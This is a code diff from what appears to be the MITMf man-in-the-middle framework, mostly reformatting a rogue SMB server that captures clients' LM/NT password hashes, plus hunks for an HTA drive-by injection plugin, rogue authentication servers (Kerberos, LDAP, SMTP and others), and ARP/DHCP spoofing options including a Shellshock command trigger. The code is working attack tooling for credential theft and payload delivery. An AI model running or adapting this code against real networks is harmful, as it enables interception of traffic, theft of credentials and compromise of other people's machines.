-							Body = SMBSession2Accept()
+                            Body = SMBSession2Accept()
-							Body.calculate()
+                            Body.calculate()
-							Packet = str(Header)+str(Body)
+                            Packet = str(Header)+str(Body)
-							Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+                            Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-							self.request.send(Buffer)
+                            self.request.send(Buffer)
-							data = self.request.recv(1024)
+                            data = self.request.recv(1024)
-				
+                
-				# Tree Connect AndX Request
+                # Tree Connect AndX Request
-				if data[8:10] == "\x75\x00":
+                if data[8:10] == "\x75\x00":
-					ParseShare(data)
+                    ParseShare(data)
-					# Tree Connect AndX Response
+                    # Tree Connect AndX Response
-					Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
+                    Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
-					Body = SMBTreeData()
+                    Body = SMBTreeData()
-					Body.calculate()
+                    Body.calculate()
-					Packet = str(Header)+str(Body)
+                    Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+                    Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					self.request.send(Buffer)
+                    self.request.send(Buffer)
-					data = self.request.recv(1024)
+                    data = self.request.recv(1024)
-				##Tree Disconnect.
+                ##Tree Disconnect.
-				if data[8:10] == "\x71\x00":
+                if data[8:10] == "\x71\x00":
-					Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+                    Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
+                    Body = "\x00\x00\x00"
-					Packet = str(Header)+str(Body)
+                    Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+                    Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					
+                    
-					self.request.send(Buffer)
+                    self.request.send(Buffer)
-					data = self.request.recv(1024)
+                    data = self.request.recv(1024)
-				
+                
-				##NT_CREATE Access Denied.
+                ##NT_CREATE Access Denied.
-				if data[8:10] == "\xa2\x00":
+                if data[8:10] == "\xa2\x00":
-					Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+                    Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
+                    Body = "\x00\x00\x00"
-					Packet = str(Header)+str(Body)
+                    Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+                    Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					self.request.send(Buffer)
+                    self.request.send(Buffer)
-					data = self.request.recv(1024)
+                    data = self.request.recv(1024)
-				
+                
-				##Trans2 Access Denied.
+                ##Trans2 Access Denied.
-				if data[8:10] == "\x25\x00":
+                if data[8:10] == "\x25\x00":
-					Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+                    Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
+                    Body = "\x00\x00\x00"
-					Packet = str(Header)+str(Body)
+                    Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+                    Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					self.request.send(Buffer)
+                    self.request.send(Buffer)
-					data = self.request.recv(1024)
+                    data = self.request.recv(1024)
-				
+                
-				##LogOff.
+                ##LogOff.
-				if data[8:10] == "\x74\x00":
+                if data[8:10] == "\x74\x00":
-					Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+                    Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x02\xff\x00\x27\x00\x00\x00"
+                    Body = "\x02\xff\x00\x27\x00\x00\x00"
-					Packet = str(Header)+str(Body)
+                    Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+                    Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					self.request.send(Buffer)
+                    self.request.send(Buffer)
-					data = self.request.recv(1024)
+                    data = self.request.recv(1024)
-		except socket.timeout:
+        except socket.timeout:
-			pass
+            pass
 # SMB Server class, old version
 class SMB1LM(BaseRequestHandler):
-	def handle(self):
+    def handle(self):
-		try:
+        try:
-			self.request.settimeout(0.5)
+            self.request.settimeout(0.5)
-			data = self.request.recv(1024)
+            data = self.request.recv(1024)
-			
+            
-			##session request 139
+            ##session request 139
-			if data[0] == "\x81":
+            if data[0] == "\x81":
-				Buffer = "\x82\x00\x00\x00"
+                Buffer = "\x82\x00\x00\x00"
-				self.request.send(Buffer)
+                self.request.send(Buffer)
-				data = self.request.recv(1024)
+                data = self.request.recv(1024)
-			
+            
-			##Negotiate proto answer.
+            ##Negotiate proto answer.
-			if data[8:10] == "\x72\x00":
+            if data[8:10] == "\x72\x00":
-				head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
+                head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
-				Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=settings.Config.Challenge)
+                Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=settings.Config.Challenge)
-				Body.calculate()
+                Body.calculate()
-				Packet = str(head)+str(Body)
+                Packet = str(head)+str(Body)
-				Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+                Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-				self.request.send(Buffer)
+                self.request.send(Buffer)
-				data = self.request.recv(1024)
+                data = self.request.recv(1024)
-			
+            
-			##Session Setup AndX Request
+            ##Session Setup AndX Request
-			if data[8:10] == "\x73\x00":
+            if data[8:10] == "\x73\x00":
-				if Is_LMNT_Anonymous(data):
+                if Is_LMNT_Anonymous(data):
-					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+                    head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Packet = str(head)+str(SMBSessEmpty())
+                    Packet = str(head)+str(SMBSessEmpty())
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+                    Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					self.request.send(Buffer)
+                    self.request.send(Buffer)
-				else:
+                else:
-					ParseLMNTHash(data,self.client_address[0])
+                    ParseLMNTHash(data,self.client_address[0])
-					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+                    head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Packet = str(head)+str(SMBSessEmpty())
+                    Packet = str(head)+str(SMBSessEmpty())
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+                    Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					self.request.send(Buffer)
+                    self.request.send(Buffer)
-					data = self.request.recv(1024)
+                    data = self.request.recv(1024)
-		except Exception:
+        except Exception:
-			self.request.close()
+            self.request.close()
-			pass
+            pass
--- a/mitmf.py
+++ b/mitmf.py
@ -82,7 +82,7 @@ from core.logger import logger
 formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
 log = logger().setup_logger("MITMf", formatter)
-log.debug("MITMf started:{}".format(sys.argv))
+log.debug("MITMf started: {}".format(sys.argv))
 from core.sslstrip.CookieCleaner import CookieCleaner
 from core.proxyplugins import ProxyPlugins
--- a/plugins/htadriveby.py
+++ b/plugins/htadriveby.py
@ -30,24 +30,18 @@ class HTADriveBy(Inject, Plugin):
    def initialize(self, options):
        self.bar_text = options.text
        self.ip = options.ip
        self.hta = options.hta_app.split('/')[-1]
        Inject.initialize(self, options)
        self.html_payload = self.get_payload()
        from core.servers.HTTP import HTTP
-        def hta_request(path):
+        HTTP.add_static_endpoint(self.hta, "application/hta", options.hta_app)
            if path == options.hta_app.split('/')[-1]:
                with open(options.hta_app) as hta_file:
                    resp = flask.Response(hta_file.read())
                resp.headers['Content-Type'] = "application/hta"
                return resp
        HTTPserver().add_endpoint(hta_request)
    def get_payload(self):
        with open("./core/html/htadriveby.html", 'r') as file:
            payload = re.sub("_TEXT_GOES_HERE_", self.bar_text, file.read())
            payload = re.sub("_IP_GOES_HERE_", self.ip, payload)
            payload = re.sub("_PAYLOAD_GOES_HERE_", self.hta, payload)
        return payload
    def options(self, options):
--- a/plugins/responder.py
+++ b/plugins/responder.py
@ -44,30 +44,37 @@ class Responder(Plugin):
        if self.config["Responder"]["SQL"].lower() == "on":
            from core.servers.MSSQL import MSSQL
            self.tree_info.append("MSSQL server [ON]")
            MSSQL().start()
        if self.config["Responder"]["Kerberos"].lower() == "on":
            from core.servers.Kerberos import Kerberos
            self.tree_info.append("Kerberos server [ON]")
            Kerberos().start()
        if self.config["Responder"]["FTP"].lower() == "on":
            from core.servers.FTP import FTP
            self.tree_info.append("FTP server [ON]")
            FTP().start()
        if self.config["Responder"]["POP"].lower() == "on":
            from core.servers.POP3 import POP3
            self.tree_info.append("POP3 server [ON]")
            POP3().start()
        if self.config["Responder"]["SMTP"].lower() == "on":
            from core.servers.SMTP import SMTP
            self.tree_info.append("SMTP server [ON]")
            SMTP().start()
        if self.config["Responder"]["IMAP"].lower() == "on":
            from core.servers.IMAP import IMAP
            self.tree_info.append("IMAP server [ON]")
            IMAP().start()
        if self.config["Responder"]["LDAP"].lower() == "on":
            from core.servers.LDAP import LDAP
            self.tree_info.append("LDAP server [ON]")
            LDAP().start()
    def reactor(self, strippingFactory):
--- a/plugins/spoof.py
+++ b/plugins/spoof.py
@ -93,6 +93,7 @@ class Spoof(Plugin):
        options.add_argument('--netmask', dest='netmask', type=str, default='255.255.255.0', help='The netmask of the network')
        options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
        options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
        options.add_argument('--gatewaymac', dest='gatewaymac', help='Specify the gateway MAC [will auto resolve if ommited]')
        options.add_argument('--targets', dest='targets', help='Specify host/s to poison [if ommited will default to subnet]')
        options.add_argument('--ignore', dest='ignore', help='Specify host/s not to poison')
        options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')